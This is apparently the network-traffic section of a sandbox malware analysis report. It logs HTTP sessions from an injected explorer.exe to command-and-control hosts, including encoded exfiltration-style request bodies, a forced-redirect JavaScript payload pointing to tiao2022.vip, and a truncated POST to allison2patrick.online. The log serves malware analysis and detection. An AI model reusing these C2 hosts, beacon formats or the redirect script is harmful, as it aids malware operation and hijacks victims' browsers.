48 77 2d 4c 53 74 6c 43 32 4f 74 65 39 35 33 48 66 39 70 68 44 6a 42 31 5a 38 69 73 6f 6c 32 4b 48 28 39 73 66 75 56 58 69 50 4a 4b 74 79 50 57 48 77 45 71 48 42 4b 6b 75 76 6d 67 44 53 6c 45 56 47 48 51 30 6b 75 39 51 41 42 56 62 28 63 5a 72 47 36 64 34 41 51 6d 64 39 2d 38 48 49 66 67 58 52 68 35 61 47 57 70 65 4a 4c 49 4a 75 34 53 70 39 36 38 30 4f 59 5a 39 6d 58 56 6f 4d 78 72 4b 55 4c 4d 79 43 6c 6d 6e 70 48 73 74 42 53 33 79 38 5a 63 6f 7a 30 67 6b 43 4a 4c 71 7e 70 38 33 48 4a 51 50 4e 4a 30 69 6f 5a 5a 32 4d 52 46 4c 61 59 6d 32 6c 68 7e 63 6e 34 35 32 70 48 4a 57 55 42 74 7a 41 57 6b 31 45 7a 73 70 71 6e 53 39 42 6b 6b 4a 73 49 6a 42 44 68 45 41 59 65 55 55 68 4f 70 64 5a 52 71 79 4b 50 58 76 66 44 61 4f 6e 41 6d 42 4c 4a 68 43 78 6f 4f 62 41 63 43 34 48 48 52 39 58 31 5a 6c 49 4a 7e 78 6e 32 61 63 77 32 51 4e 30 56 53 6a 47 32 4a 56 35 32 52 34 51 61 32 61 77 75 4c 6b 32 58 33 59 57 34 77 79 31 30 4c 78 63 66 37 42 71 77 45 38 42 56 45 74 51 61 6f 6a 58 45 66 78 57 75 73 53 37 44 43 52 78 61 58 53 75 55 36 79 45 51 64 6e 5a 31 28 56 4c 63 4d 70 4a 4c 47 55 65 4f 7e 6a 57 49 69 6c 36 4f 42 6c 64 6a 55 56 38 2d 5a 59 6d 47 7e 4a 61 65 6d 67 31 56 7e 52 6a 6f 66 4f 62 50 6c 2d 6c 74 43 47 66 61 62 65 5a 75 58 61 50 4d 74 76 6a 52 64 38 6b 65 69 4a 66 6d 72 70 61 76 34 53 50 62 50 39 31 32 74 55 62 4b 6a 4b 4a 36 79 47 71 74 57 71 42 4d 67 6d 57 61 61 79 66 32 28 4e 53 4b 34 54 77 34 49 57 5a 58 68 6c 57 74 52 36 7a 4b 61 66 35 34 44 43 59 5a 47 48 37 6f 4a 37 69 79 30 6e 65 61 45 74 7a 74 4b 76 39 54 5a 62 75 4f 31 76 55 67 78 57 38 38 43 64 53
                                                                                                                      Data Ascii: ICHyvj5=jRIopuIKm5m4BfQXdJDzqIUYcYfTDThRrXk2mflilbEkG1A29K6crb3_Od7qU31C5LLeVeTo1prr8U35o8I1j_OFkL83WGh7c9cMvQNLOjh0qm(HbkJuoHU3PatuhMWUsEIVG2rtNsNRc4FSutcS3Q0PA_Ez6SpgL_ye76ZHHqg3JoNkhfCrsjzqQ005cBb4SKyghlCZekEHhpaJndQ0kYPnoS8G4epN55YeiBV8expmsMn4VH1yAEFnv8nwuFVyCL5Xd2uKS7CD2_ISxQfqDIoANuWjQ0yDPEYCNQd5tSPKVL6l6LF7lC16gGnXALXIXz7ijkuHJLe8a9Na7gwPYr6XoxElMV2wfpmCBfAYZkCcAeVtqDvdvop0NAzXuR~-nCWN9nghed~RNFkwH3sKpK0ma6K7ShgZgfa3Srr-12dCYWji9fqXfBc0c5wDFHCVISUwDxu37LyRXg3dhy6BOI~P1HPxSUrRPGvgI0wJ89ljM1RnYx9qqlY2ULmULJaRihjfltftETxkSo94xFfPiMxoge(gqZ1Ig4PkMLMXFq(KMC43t4KoLnm-6G5d~gQSDgNFsvydmHTB5MHAg3SiQuysk59DtS~r51G5ICawqTJSOk9jyFAzsJ51Bf~FTnF3yqwlszWP4uJBf-kMPFYrUCAxg9ihqYkHj2M7NDxcJcdGcVaHk1oWaYMrQWY1MGGbszF0uoJnstBFqE2AnoAn(B5l0KhDL0bvWXsyAaNCuHXbVu1mJZ7oChIZT_snkMcowxniPRnzA4aaGXZ2TjhSB17QFYU9rdgQ~2DaZbkpIVKrOW7y(hkGsh~RukscfHw-LStlC2Ote953Hf9phDjB1Z8isol2KH(9sfuVXiPJKtyPWHwEqHBKkuvmgDSlEVGHQ0ku9QABVb(cZrG6d4AQmd9-8HIfgXRh5aGWpeJLIJu4Sp9680OYZ9mXVoMxrKULMyClmnpHstBS3y8Zcoz0gkCJLq~p83HJQPNJ0ioZZ2MRFLaYm2lh~cn452pHJWUBtzAWk1EzspqnS9BkkJsIjBDhEAYeUUhOpdZRqyKPXvfDaOnAmBLJhCxoObAcC4HHR9X1ZlIJ~xn2acw2QN0VSjG2JV52R4Qa2awuLk2X3YW4wy10Lxcf7BqwE8BVEtQaojXEfxWusS7DCRxaXSuU6yEQdnZ1(VLcMpJLGUeO~jWIil6OBldjUV8-ZYmG~Jaemg1V~RjofObPl-ltCGfabeZuXaPMtvjRd8keiJfmrpav4SPbP912tUbKjKJ6yGqtWqBMgmWaayf2(NSK4Tw4IWZXhlWtR6zKaf54DCYZGH7oJ7iy0neaEtztKv9TZbuO1vUgxW88CdStSvXpYRbz4inWmiQ0vZwG0GOukipiOQf7tf(nwzBK6_hwGfFVc4iwXyvBLa8yybS8L-cviRtFLKL5doNq3zQRXtH7~k(IHhM_hbOrAzYEBQI7WEKompoRFbHKDbJ6nKVH84epZRxe8TK8Aimw1yQtxxuj1JzY9KgtY1EmUZ0h8Inh6WFkBYMd3frIIlNkWGeBk-(xeyl5eZ1IlOmHNEM2W2F0hoXcgdkB4DlNn8(lliA9uJck0viLmYcEcPOTV-Nr6nLP2CjtVskNjGdb~J89QXW-6oOIxY72nvbxqOcX(nlFQFkvvVJOrToBlNvAT6npEd5G2bhhX20aOQnVVRdTmSIKgwugWQVXhAKVIuyWiGDHEp(V7vesKahAt5yB16(oChTTUT8Q4trdXL826N(iyPWP(Q8-h9Ij7-boxDLDktdgHlwMfbW_NQ8se1QeqtUlfjHD(CakcEZEa2NxlU5SvR~kIw~YGLlRYQY-5o(RCzkptrDovqb_fKruRh~S91sOjDDeJ7vtDADVf7G2U6xex9ig4GSiKWE1gT2bWAz7FEuoDZ78bwTBl-7CQYhadYoB~9Zd(A90~Oud78dQD5rKnIeF5KYf(Ee0JEJYY41net7_ZtLE~SbwMRFVqcHCxu3XskUloHL9V-djQy017Y94YxHDTSkITHyjR7fNPL8GlY0w9V4A04MVUKEkOpfykBekfdbksS8DPW0GL3jcwCDJvlGR~5kC0vo6~uJNiR0bjjDeZBx-flGz~u~UsHi0b_IHDV5w6hsLEDy6VBnCTy65CLsFjs5TS6RwWJZGJb5ct1afWbPkGSaZku6YnL4B7UwOOIMG9-iMbdgN2vOJkji4FdS1JGco08jDTFlZZDhJKFAvXBMXVMZMMjlm8rZDaTbGDeRh2LrD14rQ7pEkh1FGOYsnLnlAU20XF5tlk5sxZ2913ljrRzP6okev1jm00uMDe4(aNw0ZdEl-PnhLAjzMIk0Xjn6Ig5j7o9Y4fZV76WWfD6wfZUDMJV06NZ7555~o9ntjWe(JjLqxFy4qHPmuaQ9g(S0epPNyOmtrlKSMczRpT7h4jXw3qpHMbZz6rBmtAHvbRsyAt_5MluUU8wxvooaf1ZChRsO8mRKnvrzGH7nZJBS0N9hwdH7Tvws8DvZyDMTIHlN5vtPArchrAqdlYyC4PQtjGLim89PqhF1cTr3I3GeMVrkC9oFkjt4t7WgVf_RFXuCjns1pn1WtyfeL1NxqyCj1YHtslnsTrBKyrVgJrzPLwAc_A5lMueviCNR5VLSH~4jGepB1ljDC1CZDeijQafIxizb6gCIJzqfD65wHcUiYnselXztnD37zTzZHPZxJDWdOYPaZed7U~UvLH_bmxmoA6twVT08OpTw2WxszWQd9dMSjCorLuvS3ME9FhUUN4axGsEHmIF99aXj7CHY1sQN1eNt6CPS-4Zf6ZaNnv9wF3nS2c90ohDJWHHJZ9f01jEdtNLF53U2R53bACuRu6cgiVDydzlY1PcwR7R2qU6tILR3uFlDCgMrVeAgm7ZgR5Mw1VRPlScR6i0TKHhd1Q79qoSveNUFt9MF-bi8gNxNnUJedCr~-pHbVYuv08XEQXhLuXaJQUcWrBidQKOX2aJ6F~GDN3Jnvok8KZdAlAwhsipHcr4uSkQct~eY4k2HIyP0anz1xkkv7JqpQ7d9R1I6vPNwBLwjhm2HwtfM5XkX_5cXBK_hqX0gqS8XhncWfev6h(I6XS_t_4LuLr6dKu1fnQvsBSjCPBSrEyZLrTYIpjMgz37vhDiUo5VfaZXHR6bIRGKTkIa(V2toTlW(aLQS3~LgVhEGKYPtnnacPws20IiHtteqri1F9WkQcbwwPj0d5no83RJ7Z6Lb3uK74NsyfvhfAIa07V-yyNU8zemaeCDj1PriIBrv4qdoUCx03QHhDMFZ5WqaoWAOJIerv6DyFm0dPaTBfTVC2(c(a56u6OI4dIhhP3qM4W658oRcEyizM8cZwsTRnA4IleyZPaRSvr81Z7vz0Uw(2RhlteuiOkHGzMKYPG9Dq1VddmcoWS51_MYV-77uj5KEHpD7JkBCts8W6NFZL2SquKyoICPDNp7D8n1yq0T~ATCBEq9w3Bl63bR6aUR4F0oa6XWOhDyDusO(njqCbAq5mvzrAv7kxqpulQcC76HrheG1yuOKEfYv56gpPZ9~Rz_uQSVtY~LwRcGh_L2mc1Z2ppAzBbbTmeOsS3lCIWBjsc5PuwRxItoo6yG6-MpADEZwohwxC(oH7ATlnIb2l7DIqeNAgL8PCnPIS8y510Tks99nG9BcQN7oYVpOTIvhzfdZgKTwUnaqDlGJs3vwCwcsjmSlOEQmMqIk6RI9pgHHXC3O8Kyfp5XrWfnnw5JPBOaAR0_VwCDHhYOFvQQLyQFq6OzsUgmS0dBM9buBqkziSikRV0eBqb5AEbwxpr6U1qnFTcQH_67tmtl7XKjR27ihNr-Zb4XHFxOn-0Dc_IQCJIAojB_GWZjcJug8nDTxIYwspQWqDw4LFTeT4U53hEJoVrt06KwbxSO34tntp5yK66zvkMC3GF48h3RY_C9lLkYKB7uNzXH567985fp6pXluftXwui6ldjTYkIajUCFNl0RgYn3sBecow4GD8213O1jgFF4DZr4c7E_wXWbO8lmq5(y3baxgp1hDXvcH4nq9Kjy2b(bBAPitC4RxGuPlEImu3kGBjaokLV7y8vm
                                                                                                                      Mar 20, 2023 09:08:36.678245068 CET132INHTTP/1.1 200 OK
                                                                                                                      server: openresty/1.13.6.1
                                                                                                                      date: Mon, 20 Mar 2023 08:08:36 GMT
                                                                                                                      content-type: text/html
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: gzip
                                                                                                                      connection: close
                                                                                                                      Data Raw: 32 45 46 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 7d 7b 57 db b8 ba f7 ff e7 53 04 af b3 18 fb 20 dc 04 ca a5 a6 6e 36 85 b4 65 76 0b dd 40 e7 b2 19 16 cb 71 14 70 9b d8 19 db 01 32 21 df fd fc 9e 47 92 ad 84 74 32 b3 df f3 76 cd 80 2d cb b2 f4 e8 b9 5f c4 eb b5 e3 b3 a3 cb 5f 3f 77 1a 77 e5 70 f0 e6 bf 5e d3 af c6 20 4a 6f 43 47 a6 ce 9b ff 6a e0 df eb 3b 19 f5 d4 25 df 0e 65 19 35 e2 bb 28 2f 64 19 3a 5f 2e df 6d ee eb 9e f5 e3 bb b2 1c 6d ca df c7 c9 7d e8 3c 6e 8e a3 cd 38 1b 8e a2 32 e9 0e a4 d3 88 b3 b4 94 29 de 3d e9 84 b2 77 2b 9d 37 af 8b 38 4f 46 65 a3 9c 8c 64 e8 94 f2 b1 7c f1 35 ba 8f 54 ab f3 c6 7d 48 d2 5e f6 e0 9f 9e 77 be 7c 7a 7a 72 f9 77 38 9d 79 9e 9f a4 49 19 4e 47 79 72 1f c5 93 60 1a 67 d9 b7 44 16 37 32 8d f0 a9 5e d0 8f 06 85 9c 89 e8 6b f4 18 4c 7b 32 9d dc 0c 92 a2 0c ae 9c 6e 34 f4 d3 7c b3 17 95 91 9f ca d2 b9 9e cd 0e fe e4 33 83 2c ea c9 fc 06 33 ef 27 b7 e1 f4 71 94 f4 02 e7 cb c3 af ef be bc fb e9 e7 f7 0f 87 6f bf fc d4 bb 3c be 8d 3f 3b 62 90 c4 32 2d e4 3f e5 24 70 9a bd ed fd 9d 6e b4 1f 35 1d 11 8d 46 78 04 18 64 e9 c9 71 e0 6c b7 76 76 5b af 76 f7 9d d9 c1 81 eb 7a e1 9b e9 7d 94 37 a4 28 45 1e 4e 5f 35 f7 5a 81 cb 37 f4 c4 19 17 b2 51 94 79 12 97 ce 41 ee f7 dc 52 4c 4f 02 7a 29 9d 79 07 f4 5e 1a 36 45 12 a6 d1 7d 72 1b 95 59 ee e3 85 fc f0 16 40 f6 87 51 19 df b9 2f de 25 b9 ec 67 8f 57 bf bd f8 ad b8 76 7f eb 6d fc e6 e3 87 f7 c2 3b 48 d6 d7 dd 34 dc 48 ae 5a d7 de 4c ec ee ec 6e ad f8 f2 e7 1b fe f4 ad f8 54 f2 c5 bd 38 da e1 8b 9e 38 fe c8 17 13 71 f6 99 2f be 89 c1 3b be f8 20 7e 1d f3 45 47 1c df f2 c5 48 1c fd c2 17 7d f1 be c3 17 0f a2 f8 c2 17 1f ab 45 4d 67 58 6e ee a6 9e a0 55 a7 62 1a d1 9a b8 d3 a1 e0 95 f1 f5 85 b8 97 79 01 c0 f2 dd a3 7e 3d 09 73 77 77 ef d5 9e 27 32 5c bd 6a be f2 44 84 8b fd dd 56 d3 3b 88 07 51 51 34 0a 20 4c 0a c0 8e 63 00 8d e0 ed 4d cb 7c 32 4d fa ee 9a 7c 7a 72 b2 ee 57 09 90 af 85 84 97 59 bf 21 bd 5c 96 e3 3c 75 9b 22 f2 ff ed b9 ce a9 7c 68 80 0a ca 24 bd 6d 44 8d 23 c6 8e 71 4e a8 d7 c8 09 fb 73 59 34 a2 b4 a1 c6 69 44 45 23 49 47 e3 d2 01 d0 f1 85 72 c9 17 ca c5 2f 5c ac 1a bd 31 cc 7a 72 d0 28 33 9a 48 23 29 e9 1b 49 99 44 83 c6 28 cf 46 32 2f 41 0e f8 e0 19 2f c5 c7 a2 93 db d4 2d ef 92 02 8b 15 ba 15 30 cd d1 cd 95 9e df cf f2 4e 04 84 71 25 f0 6e 20 cb 2b e0 e3 75 28 0f 18 4e 40 33 2c 3d f3 7f f7 dc d2 3b 48 fd 81 4c 6f cb bb f5 f5 7c 7d dd c0 2a 34 b0 42 5b 3a 3f 9a c4 cc 1a 68 76 0d f8 7e 70 7e f0 31 2e 68 02 a0 ff c1 69 24 00 16 cd ba 04 d0 65 af 11 95 98 55 77 5c 4a 80 b0 d7 88 01 c7 34 2b 1b 5d 49 bc 27 bd 45 07 0c d7 97 11 36 44 36 7e f0 cc 48 a5 70 fc 46 e3 a4 6c 3c 24 83 41 e3 2e ba 97 78 ad 21 fb 7d 0c ea 3b 9e 27 00 2d 89 31 f3 2b 09 7c c7 3d c1 e2 aa bc 0e 73 dc cc 30 17 2c 5e 7a 53 33 47 e7 30 6d c8 3c cf f2 46 16 c7 f8 52 af f1 70 97 60 7b 97 ef ba 23 a4 37 9b cd 14 b0 e2 70 da 95 11 ae 83 c4 8f a5 af ae 05 0f f6 d6 6a b7 1a 6c de 71 9f 25 bd 06 f0 6c 8e 6b e8 c6 22 0a f4 d5 ef 63 39 96 97 c9 50 9a 06 ab bf dd 5c 96 ef c7 60 59 fa 2d e2 0e e6 3a 8a e3 6c 0c 9a d2 8f 00 fe 1e a8 c1 dc 82 13 e7 d5 c7 be 16 87 66 4b 8a 60 3a 13 cc 64 ea 16 3d 02 b6 ad 30 af e3 e5 b4 88 62 e2 79 a7 51 3d c9 92 6e 3e 0f a2 24 d5 1d 31 16 d8 f9 41 7f 9c 72 df 46 8f b6 80 a9 d0 2b ef f2 ec a1 91 82 d0 3a b4 0d ae 73 88 6d 4d d2 7e a6 a9 aa 30 94 46 84 c6 ec a1 91 80 d1 97 49 3f 91
                                                                                                                      Data Ascii: 2EF2}{WS n6ev@qp2!Gt2v-__?wwp^ JoCGj;%e5(/d:_.mm}<n82)=w+78OFed|5T}H^w|zzrw8yINGyr`gD72^kL{2n4|3,3'qo<?;b2-?$pn5Fxdqlvv[vz}7(EN_5Z7QyARLOz)y^6E}rY@Q/%gWvm;H4HZLnT88q/; ~EGH}EMgXnUby~=sww'2\jDV;QQ4 LcM|2M|zrWY!\<u"|h$mD#qNsY4iDE#IGr/\1zr(3H#)ID(F2/A/-0Nq%n +u(N@3,=;HLo|}*4B[:?hv~p~1.hi$eUw\J4+]I'E6D6~HpFl<$A.x!};'-1+|=s0,^zS3G0m<FRp`{#7pjlq%lk"c9P\`Y-:lfK`:d=0byQ=n>$1ArF+:smM~0FI?
                                                                                                                      Mar 20, 2023 09:08:36.678307056 CET134INData Raw: f9 9a 26 b5 31 6d f6 b3 91 4e 68 14 20 7c c3 31 c8 23 85 d3 78 00 99 a6 12 0c 85 f6 18 08 73 a0 68 be 41 63 cc aa 19 f6 15 b7 f8 3f 9a 23 8d 1d d2 1a 0b b0 f6 d8 13 c0 be c4 ff d7 c4 c3 47 e8 91 70 68 c1 0e d0 93 b8 55 63 10 4e a3 c1 20 7b b8 e9
                                                                                                                      Data Ascii: &1mNh |1#xshAc?#GphUcN {cp\2BC$JZxahwy=y,/n)+izxwm(A 0T3*\nc|d8
                                                                                                                      Mar 20, 2023 09:08:36.678327084 CET135INData Raw: ec 75 8f 98 28 18 18 f8 60 39 09 22 7f 84 b5 3e 3d 35 67 07 63 20 a5 28 40 26 24 0e 00 98 a7 27 be 01 37 85 a9 99 5b ca 2b 75 9c 4a c0 8d 9e c3 c9 4a bf 98 f0 3e 45 23 40 cc 10 11 6c 73 4f 89 a1 30 ca 6f c7 43 30 b3 42 3b 82 de 34 d7 d7 95 1e 07
                                                                                                                      Data Ascii: u(`9">=5gc (@&$'7[+uJJ>E#@lsO0oC0B;4X=j^`(w[k\qHQf\TVB0;hbZMldit?b@~WHLEXa/DFE]ZCc/66^ck6<(
                                                                                                                      Mar 20, 2023 09:08:36.678345919 CET136INData Raw: 8a 6f 13 be 28 9e 21 4a 05 fa 04 fb 4d ec 15 08 4c fe ba 12 b1 fe 1c b8 7c 73 d8 f6 e3 7c 32 2a 99 26 e8 6e 58 1c f1 bd 4d eb d5 96 c9 76 6b 67 5d 5e 95 1b 1b d7 41 6b f7 7f 3e 45 e5 9d 0f 37 4d 0f da af 07 43 01 81 d9 9c 38 c6 39 37 fd 14 0d e0
                                                                                                                      Data Ascii: o(!JML|s|2*&nXMvkg]^Ak>E7MC897|.$iV'RH6K1tk99P<q*_f='nB@SHQc`VMAO"R~r`7S{/@l}`{9L
                                                                                                                      Mar 20, 2023 09:08:36.678364992 CET138INData Raw: 93 29 ec 12 ce 34 a5 f4 20 08 04 cb 66 d3 23 d2 8c c2 04 4f 20 69 10 7c 5e 01 97 9b 43 2d 96 13 65 98 a4 62 f0 33 b7 40 9f 01 4c e1 d3 25 98 d1 1e 94 48 03 7d 9b 61 8b 23 68 98 50 ca 78 7d bd 3a 4b 56 d9 68 eb eb da 56 33 2c 87 84 d6 9f bd f6 73
                                                                                                                      Data Ascii: )4 f#O i|^C-eb3@L%H}a#hPx}:KVhV3,s{\H]]_gMu>5bc*5+%UYs34u-#pf"k:cXR~7p;505FA(ey;F0wwPaZ$
                                                                                                                      Mar 20, 2023 09:08:36.678384066 CET139INData Raw: ef 3a e7 37 ef be 7c 54 2e bf 4c d4 c3 db ee 3f 4e 25 d1 38 c5 fe 64 4d 1f 3a 9b 15 89 b7 b1 24 8c 82 c7 31 1b e7 b1 84 9f 16 f0 53 01 de 3e a2 47 8c 67 dd a2 3c d7 cf 19 b1 4c 67 8a c6 38 9b ec df 75 50 91 e5 6c c2 d9 e6 20 c7 c0 e9 a7 ce 46 8c
                                                                                                                      Data Ascii: :7|T.L?N%8dM:$1S>Gg<Lg8uPl FA`Rr$03s=Ob:a:Wkb!6,lU<Tgpr5TNR8pbkf)O-'&zlgi0Tj.oR/}I,H_:
                                                                                                                      Mar 20, 2023 09:08:36.678401947 CET140INData Raw: a8 2a 26 65 e8 4b 4a fd af c1 7e 6d d2 7d 61 f4 db fe 68 91 b7 29 11 2d 60 68 a5 b4 1b 79 5b 79 2b b9 c9 4a 06 e0 d4 57 5f 42 a1 7a 85 4c a5 3b 99 52 9d 04 c2 da 6e 2e 76 76 5f 6d e1 fc 1e 6e 44 46 14 1f 36 32 05 29 61 d2 c0 60 08 02 9c c7 c2 14
                                                                                                                      Data Ascii: *&eKJ~m}ah)-`hy[y+JW_BzL;Rn.vv_mnDF62)a`?<|7:C=-W&#2Bb#~:z!5t:tD|q"PQ\K(:#KK1T'XZXMvL6q._dYx`6nCidIH
                                                                                                                      Mar 20, 2023 09:08:36.678421021 CET142INData Raw: d7 0e ba c8 89 f8 36 9b 21 c6 ec c6 94 cf e1 16 f5 fc 16 32 2d cd c4 a0 c7 22 67 10 3a 4d e8 8c cb 3e 8e d0 84 b6 00 3e 4f 01 f8 b0 b5 45 39 ac 69 8c 0c 28 32 96 ad b9 a5 38 2e 0f 3b 4d 0f 91 e6 bb f0 70 6e 7a 82 26 47 5d 72 f8 3b 61 74 00 c0 21
                                                                                                                      Data Ascii: 6!2-"g:M>>OE9i(28.;Mpnz&G]r;at!x#29%W,PG({ !nIiy"o}@G8/H|A0PISpdu/Z8VHxhmIc5oWDWaX:lCf&p@1
                                                                                                                      Mar 20, 2023 09:08:36.678453922 CET143INData Raw: 3b b1 98 a5 4e a5 b6 5a 28 61 12 82 cd 78 f7 2a cd 0b 55 53 a4 27 42 9e 9b 8a 46 1c 95 a7 a2 10 f2 aa 52 b1 3e e7 58 23 1c 8d 0b 56 3f dc 11 4a c3 c9 2b e3 05 d1 1f 6d 91 83 ee 96 7d b0 2a 32 48 0f ea 5c 7e 8a 6b b2 44 77 9d 7f fc a3 cc aa cf 35
                                                                                                                      Data Ascii: ;NZ(ax*US'BFR>X#V?J+m}*2H\~kDw50!c4,WnZlt<0|ElyuN+r],Ux}\$0acS;5VW>eNjL7:!"Caa:)}z`7T%K:;nsRC
                                                                                                                      Mar 20, 2023 09:08:36.678473949 CET144INData Raw: f8 a9 5a f5 82 18 17 d5 99 3d d5 d6 e0 28 cd d2 67 c4 06 a5 61 75 11 54 7c f2 53 e1 d8 1f dd be e9 42 b4 c2 98 7e 7a aa 30 9f 2b 3e 21 6c d5 8b e0 ed 8c f5 70 ac 95 38 ef 88 a8 61 6e 02 15 4b 02 e3 87 b3 0d 44 09 1c 77 02 ba a3 c3 03 52 29 7b c5
                                                                                                                      Data Ascii: Z=(gauT|SB~z0+>!lp8anKDwR){&l:+ELK,]g~7?[C{+:K@dQ nfx&~W|G=7Yy!A [_tcW/m%Q{`ykG2oEgOO'


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      20192.168.2.349719162.209.159.14280C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:17.897640944 CET284OUTData Raw: 50
                                                                                                                      Data Ascii: P
                                                                                                                      Mar 20, 2023 09:10:18.058856964 CET284INHTTP/1.0 200 OK
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=259200
                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                      Content-Length: 426
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 74 69 61 6f 32 30 32 32 2e 76 69 70 3a 31 32 33 30 36 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://tiao2022.vip:12306/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
                                                                                                                      Mar 20, 2023 09:10:18.063162088 CET284OUTData Raw: 4f
                                                                                                                      Data Ascii: O


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      21192.168.2.349720162.209.159.14280C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:20.571865082 CET285OUTData Raw: 47
                                                                                                                      Data Ascii: G
                                                                                                                      Mar 20, 2023 09:10:20.727653980 CET285INHTTP/1.0 200 OK
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=259200
                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                      Content-Length: 426
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 74 69 61 6f 32 30 32 32 2e 76 69 70 3a 31 32 33 30 36 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://tiao2022.vip:12306/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
                                                                                                                      Mar 20, 2023 09:10:20.727864981 CET285OUTData Raw: 45
                                                                                                                      Data Ascii: E


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      22192.168.2.34972162.4.21.19080C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:25.859086990 CET287OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.allison2patrick.online
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.allison2patrick.online
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.allison2patrick.online/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
